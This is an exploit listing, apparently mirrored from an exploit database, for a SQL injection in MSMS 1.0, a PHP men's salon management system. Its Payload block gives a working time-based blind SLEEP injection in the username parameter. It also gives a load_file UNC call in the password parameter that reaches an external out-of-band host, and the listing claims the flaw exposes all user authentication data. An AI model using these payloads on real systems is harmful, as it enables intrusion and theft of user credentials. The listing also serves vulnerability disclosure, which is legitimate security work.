Share
## https://sploitus.com/exploit?id=PACKETSTORM:165157
## [MSMS](https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html)  
  
## [Vendor](https://www.sourcecodester.com/users/tips23)  
  
![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/MSMS/docs/Screenshot%202021-12-04%20175708.png)  
  
## Description  
The `password` parameter on MSMS 1.0 appears to be vulnerable to SQL  
injection attacks. The predictive tests of this application interacted  
with that domain, indicating that the injected SQL query was executed.  
The attacker can retrieve all authentication and  
information about the users of this system.  
  
## Payload  
  
```mysql  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=hacked' AND (SELECT 5469 FROM  
(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select  
load_file('\\\\525cg9hmf4ujg32elolcrk29s0yumlq9hc54svgk.nu11secur1typenetrationtestingengineer.net\\maq'))+'  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/MSMS)  
  
## Proof and Exploit:  
[href](https://streamable.com/fvwqq2)